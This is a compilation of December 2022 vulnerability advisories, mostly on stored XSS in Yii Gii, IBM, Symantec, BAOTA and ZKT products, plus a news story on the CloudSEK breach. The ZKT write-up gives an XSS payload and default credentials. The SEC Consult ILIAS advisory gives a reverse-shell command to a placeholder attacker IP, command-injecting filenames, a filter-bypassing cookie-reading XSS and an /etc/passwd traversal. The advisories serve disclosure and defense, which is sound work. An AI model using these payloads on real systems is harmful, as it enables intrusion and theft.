Yii Yii2 Gii through 2.2.4 allows stored XSS by injecting a payload into any field.

\[Suggested description\]

Yii Yii2 Gii through 2.2.4 allows stored XSS by injecting a payload into any field.

\------------------------------------------

\[Vulnerability Type\]

Cross Site Scripting (XSS)

\------------------------------------------

\[Vendor of Product\]

Yii Software

\------------------------------------------

\[Affected Product Code Base\]

Gii - <=2.2.4

\------------------------------------------

\[Affected Component\]

affected web application page

\------------------------------------------

\[Attack Type\]

Remote

\------------------------------------------

\[Impact Denial of Service\]

true

\------------------------------------------

\[Impact Escalation of Privileges\]

true

\------------------------------------------

\[Attack Vectors\]

Some fields like Message Category (requires I18N enabled) in Model Generator, CRUD Generator or Form Generator, Author Name in Extension Generator, etc. are being cached without sanitisation of their contents when the Preview button is pressed. This leads to possibility of injecting malicious javascript in specified pages by placing it in said fields and caching it by pressing Preview button. On each consequent visit of specified pages malicious javascript will be loaded from server and executed in client's browser.

\------------------------------------------

\[Reference\]

https://github.com/yiisoft/yii2-gii

https://www.yiiframework.com/doc/guide/2.0/en/start-gii

\------------------------------------------

\[Discoverer\]

Boris Kovalkov, security researcher at SolidLab Ltd.

CVE-2022-34297: CVE-2022-34297

IBM Cloud Transformation Advisor 2.0.1 through 3.3.1 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 237214.

  

**Summary**

IBM Cloud Transformation Advisor has addressed multiple security vulnerabilities including those in Node.js, IBM WebSphere Application Server Liberty and various other libraries.

**Vulnerability Details**

**CVEID:**   CVE-2022-24839  
**DESCRIPTION:**   Sparkle Motion Nokogiri is vulnerable to a denial of service, caused by a java.lang.OutOfMemoryError exception when parsing ill-formed HTML markup in the fork of org.cyberneko.html. By sending a specially-crafted request, a remote attacker could exploit this vulnerability to cause a denial of service condition.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/224089 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2022-41299  
**DESCRIPTION:**   IBM Cloud Transformation Advisor is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.  
CVSS Base score: 3.9  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/237214 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N)

**CVEID:**   CVE-2022-21541  
**DESCRIPTION:**   An unspecified vulnerability in Java SE related to the VM component could allow an unauthenticated attacker to cause no confidentiality impact, high integrity impact, and no availability impact.  
CVSS Base score: 5.9  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/231568 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N)

**CVEID:**   CVE-2022-21540  
**DESCRIPTION:**   An unspecified vulnerability in Java SE related to the VM component could allow an unauthenticated attacker to obtain sensitive information resulting in a low confidentiality impact using unknown attack vectors.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/231567 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)

**CVEID:**   CVE-2022-25857  
**DESCRIPTION:**   Java package org.yaml:snakeyam is vulnerable to a denial of service, caused by missing to nested depth limitation for collections. By sending a specially-crafted request, a remote attacker could exploit this vulnerability to cause a denial of service.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/234864 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2022-38751  
**DESCRIPTION:**   SnakeYAML is vulnerable to a denial of service, caused by a stack-overflow in parsing YAML files. By persuading a victim to open a specially crafted file, a remote attacker could exploit this vulnerability to cause the application to crash.  
CVSS Base score: 3.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/235311 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L)

**CVEID:**   CVE-2022-38749  
**DESCRIPTION:**   SnakeYAML is vulnerable to a denial of service, caused by a stack-overflow in parsing YAML files. By persuading a victim to open a specially crafted file, a remote attacker could exploit this vulnerability to cause the application to crash.  
CVSS Base score: 3.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/235313 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L)

**CVEID:**   CVE-2022-38750  
**DESCRIPTION:**   SnakeYAML is vulnerable to a denial of service, caused by a stack-overflow in parsing YAML files. By persuading a victim to open a specially crafted file, a remote attacker could exploit this vulnerability to cause the application to crash.  
CVSS Base score: 3.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/235312 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L)

**CVEID:**   CVE-2022-38752  
**DESCRIPTION:**   SnakeYAML is vulnerable to a denial of service, caused by a stack-overflow in parsing YAML files. By persuading a victim to open a specially crafted file, a remote attacker could exploit this vulnerability to cause the application to crash.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/235310 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)

**CVEID:**   CVE-2022-40152  
**DESCRIPTION:**   XStream is vulnerable to a denial of service, caused by a stack-based buffer overflow. By sending a specially-crafted XML data, a remote authenticated attacker could exploit this vulnerability to causes the parser to crash, and results in a denial of service condition.  
CVSS Base score: 6.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/236355 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2022-40153  
**DESCRIPTION:**   XStream is vulnerable to a denial of service, caused by a stack-based buffer overflow. By sending a specially-crafted XML data, a remote authenticated attacker could exploit this vulnerability to causes the parser to crash, and results in a denial of service condition.  
CVSS Base score: 6.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/236356 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2022-40156  
**DESCRIPTION:**   XStream is vulnerable to a denial of service, caused by a stack-based buffer overflow. By sending a specially-crafted XML data, a remote authenticated attacker could exploit this vulnerability to causes the parser to crash, and results in a denial of service condition.  
CVSS Base score: 6.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/236359 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2022-40154  
**DESCRIPTION:**   XStream is vulnerable to a denial of service, caused by a stack-based buffer overflow. By sending a specially-crafted XML data, a remote authenticated attacker could exploit this vulnerability to causes the parser to crash, and results in a denial of service condition.  
CVSS Base score: 6.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/236357 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2022-40155  
**DESCRIPTION:**   XStream is vulnerable to a denial of service, caused by a stack-based buffer overflow. By sending a specially-crafted XML data, a remote authenticated attacker could exploit this vulnerability to causes the parser to crash, and results in a denial of service condition.  
CVSS Base score: 6.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/236358 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)

**Affected Products and Versions**

**Affected Product(s)**

**Version(s)**

IBM Cloud Transformation Advisor

2.0.1 - 3.3.1

  

**Remediation/Fixes**

**Product(s)**

**Version(s)**

**Remediation/Fix/Instructions**

IBM Cloud Transformation Advisor

2.0.1 - 3.3.1

Install v3.4.0 from OperatorHub page in Red Hat OpenShift Container Platform or locally following this link.

**Workarounds and Mitigations**

None

**References**

Off

**Change History**

01 Dec 2022: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SS5Q6W","label":"IBM Cloud Transformation Advisor"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"}\],"Version":"3.4","Edition":"","Line of Business":{"code":"LOB45","label":"Automation"}}\]

CVE-2022-41299: Security Bulletin: IBM Cloud Transformation Advisor is vulnerable to multiple vulnerabilities

An authenticated user who has the privilege to add/edit annotations on the Content tab, can craft a malicious annotation that can be executed on the annotations page (Annotation Text Column).

XSS Vulnerability in Symantec Messaging Gateway

Last Updated

13 January 2023

Initial Publication Date

07 December 2022

**Summary**

An authenticated user who has the privilege to add/edit annotations on the Content tab, can craft a malicious annotation that can be executed on the annotations page.

**Affected Product(s)**

**Symantec Messaging Gateway**

**CVE**

**Supported Version(s)**

**Remediation**

CVE-2022-25629

Releases prior to Symantec Messaging Gateway 10.8 are impacted

The customers should apply Symantec Messaging Gateway 10.8

**Issue Details**

**CVE-2022-25629**

**Severity / CVSS v3.0:**

Medium / 4.8 (AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N)

**References:**

NVD: CVE-2022-25629

**Impact:**

Stored XSS Vulnerability

**Description:**

An authenticated user who has the privilege to add/edit annotations on the Content tab, can craft a malicious annotation that can be executed on the annotations page (Annotation Text Column).

**Acknowledgements**

*   _CVE-2022-25629_ _Abdullah Alomair, @i4bdullah_

**Revisions**

2022-12-07: Initial public release

CVE-2022-25629: Support Content Notification - Support Portal - Broadcom support portal

An authenticated user who has the privilege to add/edit annotations on the Content tab, can craft a malicious annotation that can be executed on the annotations page (Annotation Text Column)

XSS Vulnerability in Symantec Messaging Gateway

Last Updated

07 December 2022

Initial Publication Date

07 December 2022

**Summary**

An authenticated user who has the privilege to add/edit annotations on the Content tab, can craft a malicious annotation that can be executed on the annotations page.

**Affected Product(s)**

**Symantec Messaging Gateway**

**CVE**

**Supported Version(s)**

**Remediation**

CVE-2022-25629

10.7.4 – 10.7.13

The customers should apply Symantec Messaging Gateway 10.8

**Issue Details**

**CVE-2022-25629**

**Severity / CVSS v3.0:**

Medium / 4.8 (AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N)

**References:**

NVD: CVE-2022-25629

**Impact:**

Stored XSS Vulnerability

**Description:**

An authenticated user who has the privilege to add/edit annotations on the Content tab, can craft a malicious annotation that can be executed on the annotations page (Annotation Text Column).

**Acknowledgements**

*   _CVE-2022-25629_ _Abdullah Alomair, @i4bdullah_

**Revisions**

2022-12-07: Initial public release

In BAOTA linux panel there exists a stored xss vulnerability attackers can use to obtain sensitive information via the log analysis feature.

*   热门文章
*   最新评论
*   随机文章

**热门文章**

*   **CTF**
    
    浏览次数: 3058
    
*   **emmc写入pve**
    
    浏览次数: 2163
    
*   **MacBook M1安装Java版本Burp**
    
    浏览次数: 1335
    
*   **英特尔NUC安装UNRAID实现win显卡直通+多系统**
    
    浏览次数: 1136
    
*   **PVE**
    
    浏览次数: 1086
    

**最新评论**

*   xxx
    
    测试
    
*   我爱你
    
    我爱你
    
*   我爱你
    
    我爱你
    
*   我爱你
    
    我爱你
    
*   我爱你
    
    我爱你
    

**随机文章**

*   **emmc写入pve**
    
    浏览次数: 2163
    
*   **英特尔NUC安装UNRAID实现win显卡直通+多系统**
    
    浏览次数: 1136
    
*   **此内容被密码保护**
    
    浏览次数: 515
    
*   **MacBook M1安装Java版本Burp**
    
    浏览次数: 1335
    
*   **BAOTA linux panel storage xss vulnerability**
    
    浏览次数: 268
    

**博客信息**

*   9文章数目
*   38评论数目
*   2年347天运行天数
*   2 天前最后活动

**标签云**

暂无标签

**文章目录**

CVE-2022-4336: BAOTA linux panel storage xss vulnerability

An authenticated user can embed malicious content with XSS into the admin group policy page.

Stored XSS Vulnerability in Symantec Messaging Gateway 10.7.4

Last Updated

08 December 2022

Initial Publication Date

08 December 2022

**Summary**

An authenticated user can embed malicious content with XSS into the admin group policy page.

**Affected Product(s)**

**Symantec Messaging Gateway**

**CVE**

**Supported Version(s)**

**Remediation**

CVE-2022-25630

10.7.4 – 10.7.13

The customers should apply Symantec Messaging Gateway 10.8

**Issue Details**

**CVE-2022-25630**

**Severity / CVSS v3.0:**

Medium / 4.8 (AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N)

**References:**

NVD: CVE-2022-25630

**Impact:**

Stored XSS Vulnerability

**Description:**

An authenticated user can embed malicious content with XSS into the admin group policy page.

**Acknowledgements**

*   _CVE-2022-25630_  Omur Ugur omur.ugur@turktelekom.com.tr

**Revisions**

2022-12-0: Initial public release

CVE-2022-25630: Support Content Notification - Support Portal - Broadcom support portal

By Waqas
As seen by Hackread.com, a hacker is selling access to the CloudSEK infrastructure on multiple cybercrime forums.
This is a post from HackRead.com Read the original post: Cyber Security Firm CloudSEK Points Finger at Rival Over Breach

An Indian cyber security firm, CloudSEK, became the victim of a **cyber security incident** when an unknown threat actor managed to access its Confluence server.

According to CloudSEK’s blog post on the incident, its founder and CEO Rahul Sasi wrote that the hacker used stolen credentials from one of CloudSEK employees’ Jira accounts. Rahul further stated that the threat actor (s) compromised the employee’s Jira password to access the company’s Confluence pages.

Moreover, the hacker accessed some internal data such as three customer names with their purchase orders, **bug reports**, product dashboard screenshots, and Schema Diagrams obtained from the Confluence wiki.

Image credit: Hackread.com

CloudSEK also confirmed that server or database access wasn’t compromised. An investigation into the incident was quickly launched. Outlining possible suspects, Sasi claimed that another cyber security firm having a reputation for tracking dark web happenings could be responsible.

> “We suspect a notorious Cyber Security company that is into Dark web monitoring behind the attack. The attack and the indicators connect back to an attacker with a notorious history of using similar tactics we have observed in the past.”
> 
> Rahul Sasi

**Hacker’s Claims**

Around the same time when CloudSEK discovered the attack, that is on 6th December, Tuesday, Cyble Research & Intelligence Labs (CRIL) cyber security experts noticed a threat actor using the nick’ sedut’ who claimed to have breached the security of CloudSEK Info Security Pvt Ltd. The actor posted about hacking into the Indian firm on multiple cybercrime forums.

Cyble researchers suspect it was a targeted attack on CloudSEK and that the attacker’s objective was to negatively impact the company’s reputation within the digital threat intelligence fraternity. Revealing the attacker’s claims, Cyble researchers wrote in their **blog post** that the attacker had multiple accesses and was openly offering the data to buyers on these forums.

The data on sale included:

1.  Pre-sales info.
2.  VPN credentials.
3.  Purchase orders.
4.  Company credentials.
5.  Extensive clientele data.
6.  Project-related databases.
7.  Confidential source codes.
8.  Sensitive infrastructure details.
9.  Engineering products-related data.

Moreover, the threat actor claimed to have had access to CloudSEK’s ecosystem for several months. He supported this claim by sharing multiple screenshots and videos confirming they had access to the company’s internal servers.

Image credit: Cyble

As shown in the first screenshot, the hacker also leaked images that contained account usernames and passwords of accounts used for scraping the XSS and Breached hacking forums, and instructions on using different website crawlers, among other data.

The database is for sale for $10,000, and the engineering/employee product files are $8000 each.

**How Did it Occur?**

Sasi revealed that the hacker used the stolen Jira account credentials to access internal documents, training docs, open-source automation scripts, and Confluence pages, as these were attacked to the account.

CloudSEK also confirmed that the Jira user didn’t use a password but only SSO; his email was also protected by **MFA (multi-factor authentication)**. So, the Jira password and the user’s email account weren’t compromised.

Instead, the company believes the threat actor compromised the session cookies of the Jira user, allowing them to take over the account. How the attacker got hold of the session cookies is currently under investigation.

**Google Buys Cyber Security Firm Mandiant for $5.4 Billion**

**Cyber Security giant FireEye hacked by a foreign government**

**US Lists Kaspersky to Firms Posing Threat to National Security**

**Cyber Security Firm Mandiant Denies Being Hacked By LockBit**

**Amnesty Intl. accuses Indian cyber security firm of spyware attacks**

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Cyber Security Firm CloudSEK Points Finger at Rival Over Breach

ZKTeco Xiamen Information Technology ZKBio ECO ADMS <=3.1-164 is vulnerable to Cross Site Scripting (XSS).

**ZKT Eco ADMS - Stored XSS**

 Hi All,

I was able to identify stored XSS in one online attendance system i.e. ZKT Eco ADMS (v 3.1-164 )(Automatic Data Master Server) is a powerful web-based time and attendance management software. which is used to configure the attendance devices and manage its users.

Cve ID assigned CVE-2022-44213: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-44213

Technical details

1.  Login to ZKT Eco ADMS (default admin/admin)
2.  Click on System and click on Employee
3.  Click on Append button to add new Employee
4.  In Emp Name field Add your XSS payload. For testing I have used a non malicious code **"/><img src=a onerror=alert('stored-XSS');>**
5.  Click on Submit button, it will redirect you to the employee list, and our payload will be executed.

_XSS payload embedded in EMP NAME field._

_our payload executed successfully._

XSS has been fixed in latest versions after 3.1-164.

**Popular posts from this blog**

**Ericsson BSCS iX R18 Billing & Rating (ADMX, MX) - Stored XSS**

Dear Reader, I was able to identify stored XSS in multiple web base modules of Ericsson BSCS iX R18 Billing & Rating platform  Below are its details: # Software description: Ericsson Billing is a convergent billing solution for telecoms that combines an unrivaled combination of out-of-the box features and high configurability. As an evolution of the widely-installed Ericsson BSCS iX, Ericsson Billing provides a low-risk but effective route to capture and secure revenue streams and take advantage of business opportunities from both traditional telecom services as well as digital services, 5G and IoT. # Technical Details & Impact: There are multiple web base modules in BSCS iX e.g. ADMX, MX (monitoring center), CX etc. It was observed that ADMX and MX are vulnerable to stored XSS, In most test cases session hijacking was also possible by utilizing the XSS vulnerability. This potentially allows for full account takeover, or exploiting admin's browsers using beef

**Autoconfiguration ipv4 address 196.254.x.x IP Problem**

Today when i connect my laptop to Lan it wasn't getting the ip from my DHCP server. Instead it gives me some weird IP like 196.254.x.x . while my Wifi was working fine, I searched Alot to get to know until i found a great piece of code on a blog. so going to share with you guys. Problem with my Ip. Steps to follow: If you are Using any Firewall disable it (like i use comodo so i disable it temporary) Click on start and click on RUN (or simple press windowsKey+R ) type CMD   Now type the below Codes  netsh interface ipv4 show inter It will show like this.  As we have problem in LAN so my LAN here is Local Area Connection  and Its Idx=11 (we will use this idx number in next code) Now type in this code and replace your Idx number, as mine is 11    netsh interface ipv4 set interface 11 dadtransmits=0 store=persistent   It will show like this.  If it says OK. Congratulations you have done the difficult part Now Click on Start and Run again and Type Servic

**CSV Injection in Acunetix version 13.0.201217092**

 Hi all,  I was using Acunetix version 13.0.201217092 for scanning purposes back in Jan 2021, and I was able to identify CSV Injection vulnerability in the web scanner. Any user who is not the administrator can perform these actions which can lead to admin system compromise. For testing I used the Admin account. Lets get to the technical details. CVE ID Assigned:  CVE-2022-29315  https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29315 https://www.cve.org/CVERecord?id=CVE-2022-29315 Vulnerable Version: Before version 14 Fixed Version: 14 and 14+ # Software description: Acunetix by Invicti Security is an application security testing tool built to help small & mid-size organizations around the world take control of their web security. # Technical Details & Impact: It was observed that Target page is vulnerable to CSV Injection, using CSV injection; Maliciously crafted formulas can be used for three key attacks: Hijacking the user's computer by exploiting vulnerabilitie

CVE-2022-44213: ZKT Eco ADMS - Stored XSS

ILIAS eLearning versions 7.15 and below suffer from authenticated command injection, persistent cross site scripting, local file inclusion, and open redirection vulnerabilities.

SEC Consult Vulnerability Lab Security Advisory < 20221206-0 >  
=======================================================================  
               title: Multiple critical vulnerabilities  
             product: ILIAS eLearning platform  
  vulnerable version: <= 7.15  
       fixed version: 7.16  
          CVE number: CVE-2022-45915, CVE-2022-45916, CVE-2022-45917,  
                      CVE-2022-45918  
              impact: critical  
            homepage: https://www.ilias.de  
               found: 2022-09-30  
                  by: Anna Hartig (Office Bochum)  
                      Constantin Schwarz (Office Bochum)  
                      Niklas Schilling (Office Munich)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Atos company  
                      Europe | Asia | North America

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"Around since 1998, ILIAS is a powerful learning management system that fulfills  
all your requirements. Using its integrated tools, small and large businesses,  
universities, schools and public authorities are able to create tailored,  
individual learning scenarios."

Source: https://www.ilias.de/en/

Business recommendation:  
------------------------  
The vendor provides a patch which should be installed immediately.

SEC Consult highly recommends to perform a thorough security review of the product  
conducted by security professionals to identify and resolve potential further  
security issues.

Vulnerability overview/description:  
-----------------------------------  
1) Authenticated Direct OS Command Injection - CVE-2022-45915  
ILIAS utilizes several third-party programs to perform tasks like creating PDF  
files or scanning uploaded files for known viruses. These are called using the  
PHP exec() function. In several instances, the arguments passed to the exec()  
function contain user input that is not properly sanitized.  
By performing malicious configuration steps or uploading dangerous files, an  
attacker can execute arbitrary system commands with the rights of the web server  
user (www-data).  
The privilege required for the different instances of command injection range  
from low rights to admin rights.

2) Stored Cross-Site Scripting - CVE-2022-45916  
Multiple stored cross-site scripting vulnerabilities were identified in ILIAS  
course items. These were either achieved by bypassing existing XSS filters or  
simply by exploiting missing input validation altogether. This results in the  
execution of attacker-controlled JavaScript code by the user's browser.  
The attacker requires the right to create course items, e.g., as a tutor of a  
course.

3) Local File Inclusion - CVE-2022-45918  
The included SCORM editor features a debugger that gives authors insights into  
the current SCORM player session, as well as previous sessions. When accessing  
the logs of previous sessions, the debugger fails to validate the requested  
file path, allowing for arbitrary filesystem access.

4) Open Redirect - CVE-2022-45917  
The function shib_logout.php redirects the user to a URL specified in the  
"return" parameter. Since this parameter is not validated, an attacker can use  
it to redirect a victim to an arbitrary website. This is a powerful tool in  
phishing campaigns, as it allows hiding the malicious webpage behind a link that  
looks like it would take you to the real ILIAS webpage.

Proof of concept:  
-----------------  
1) Authenticated Direct OS Command Injection - CVE-2022-45915  
Multiple instances of command injection vulnerabilities were identified:

a) ZIP archive upload  
Normal users with open assessments can submit their solution by uploading a ZIP  
archive. These archives are extracted on the server and scanned for viruses  
recursively. The directory and file names can be used by an attacker to inject  
system commands, e.g., by including a directory with the name  
$(touch /tmp/pwned) to the ZIP archive. Exploiting this vulnerability, an attacker  
is able to get a reverse shell on the ILIAS webserver with the rights of the  
web server user (www-data).

b) Media object creation  
ILIAS can be configured so that users can create media objects based on files  
inside an "Upload Directory". Before these objects are created, the files are  
scanned for viruses. The file names can be used by an attacker to inject system  
commands. By placing a file with a name like $(touch /tmp/pwned) inside the  
upload directory and then creating a media object based on it, an attacker is  
able to execute arbitrary system commands with the rights of www-data on the  
server.

c) PDF document creation  
ILIAS provides users the functionality to export content as PDF files. A user  
with admin rights can configure the path to the preferred PDF renderer. An  
attacker can use this parameter to inject system commands. Due to missing  
input validation it is possible to inject multiple commands. The path to  
wkhtmltopdf has to be included in the payload, as ILIAS checks for it. By  
changing the path to:

/usr/local/bin/wkhtmltopdf; bash -c "bash -i >& /dev/tcp/<IP_Address_Attacker>/13373 0>&1";

an attacker can open a reverse shell with the rights of www-data that connects  
to the attacker's machine on port 13373. The reverse shell is initiated when  
the export function is triggered.  
No PDF renderer has to be installed for this vulnerability to be exploitable.

2) Stored Cross-Site Scripting - CVE-2022-45916  
Multiple instances of stored cross-site scripting were identified:

a) Several Stored XSS Attacks in Tests  
An attacker must be able to create new tests in which the JavaScript code will  
be embedded. If a victim then later accesses one of those tests, the XSS payload will  
be triggered. The "Question" input field of a test has a filter in place, which  
correctly removes HTML tags such as <script> or  
<img src="x" onerror="alert(document.cookie)">. By making use of half open HTML  
tags, this filter can be successfully bypassed. E.g.

<img src="x" onerror="alert(document.cookie)"

This half open HTML tag can also be used in the "Introductory Message" of a test  
to trigger an XSS. It's important to end the JavaScript code with a quotation  
mark or space, to properly separate it from successive HTML tags, after it's  
embedded into a test.

Finally, the "Question" input field of the question type "Long Menu" was  
identified to use no filtering at all, resulting in the unrestricted use of  
arbitrary HTML tags such as <script>.

b) Stored XSS in title of course items  
An attacker with rights to create an arbitrary course item can conduct a stored  
XSS attack by setting the title of the element to:

" onclick="alert(document.cookie)"

When a user clicks on the button to the right of the title, the XSS payload is  
triggered.

c) Stored XSS in HTML sites  
An attacker with rights to edit an HTML Learning Module can conduct a stored  
XSS attack, as it is allowed to insert JavaScript Code to the HTML page. Even  
if this behavior is intended, it is insecure and considered bad practice.

3) Local File Inclusion - CVE-2022-45918  
As a prerequisite, the SCORM debugger must be enabled for the whole ILIAS  
platform. An attacker with access to a SCORM player can open the SCORM  
debugger and request the logs of a previous session. By changing the value of  
the "logFile" query parameter of the request, they can read arbitrary  
files of the server's filesystem. For example, to read the passwd file  
on Linux systems, an attacker can change the value of the parameter logfile  
to "../../../../../../../../../etc/passwd".

4) Open Redirect - CVE-2022-45917  
The shib_logout function is vulnerable to an open redirect.  
A URL that successfully uses this vulnerability to redirect to  
"https://www.sec-consult.com" is:

http://ILIAS-URL/shib_logout.php?action=logout&return=https://www.sec-consult.com

Vulnerable / tested versions:  
-----------------------------  
The vulnerabilities were identified in ILIAS version 7.14.  
However, a brief analysis of the source code suggests, that several  
vulnerabilities are present in versions dating back to at least 3.8.4.  
Hence it is assumed that most current versions of the product are affected.

The vulnerabilities were partly fixed in version 7.15, a complete patch is  
available with version 7.16.

Vendor contact timeline:  
------------------------  
2022-10-07: Contacting vendor through security@lists.ilias.de  
2022-10-19: Sending initial email again, as the vendor did not yet respond  
2022-10-25: Extending email recipients to info@ilias.de, datenschutz@ilias.de and  
             identified personal email addresses from the vendor's website.  
2022-10-25: Sending the advisory to the provided contact  
2022-10-31: Vendor requests more information  
2022-10-31: Sending detailed PoC  
2022-11-10: Asking for current status  
2022-11-22: Vendor confirms that patches will be available by 2022-11-26  
2022-11-22: Asking about the version numbers of mentioned patches and CVE IDs  
2022-11-23: Vendor provides information about patched versions; CVE IDs will be  
             requested by SEC Consult  
2022-11-24: Vendor releases patched version 7.16  
2022-12-06: Public release of security advisory

Solution:  
---------  
Update ILIAS to version 7.16 or newer from the vendor's website:  
https://docu.ilias.de/goto.php?target=st_229

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult, an Atos company  
Europe | Asia | North America

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Atos company. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF  A. Hartig, C. Schwarz, N. Schilling / @2022

ILIAS eLearning 7.15 Command Injection / XSS / LFI / Open Redirect

Planet eStream versions prior to 6.72.10.07 suffer from shell upload, account takeover, broken access control, SQL injection, both persistent and reflective cross site scripting, path traversal, and information disclosure vulnerabilities.

Tag

#xss